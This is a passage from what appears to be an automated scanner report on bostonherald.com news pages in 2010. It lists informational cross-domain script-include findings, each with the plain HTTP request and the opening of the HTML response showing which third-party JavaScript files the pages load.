   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.146. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.147. http://bostonherald.com/news/us_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/us_politics/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:36:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.148. http://bostonherald.com/news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:39:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.149. http://bostonherald.com/news/us_politics/view/20101107eric_cantor_if_nancy_pelosi__stays_then_dems_dont_get_it/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/view/20101107eric_cantor_if_nancy_pelosi__stays_then_dems_dont_get_it/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/us_politics/view/20101107eric_cantor_if_nancy_pelosi__stays_then_dems_dont_get_it/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:39:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.150. http://bostonherald.com/news/us_politics/view/20101107georgia_details_nuclear_smuggling/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/view/20101107georgia_details_nuclear_smuggling/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/us_politics/view/20101107georgia_details_nuclear_smuggling/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:39:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.151. http://bostonherald.com/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:39:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.152. http://bostonherald.com/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=recent_bullet HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:39:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.153. http://bostonherald.com/photobox/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/photobox/index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /photobox/index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
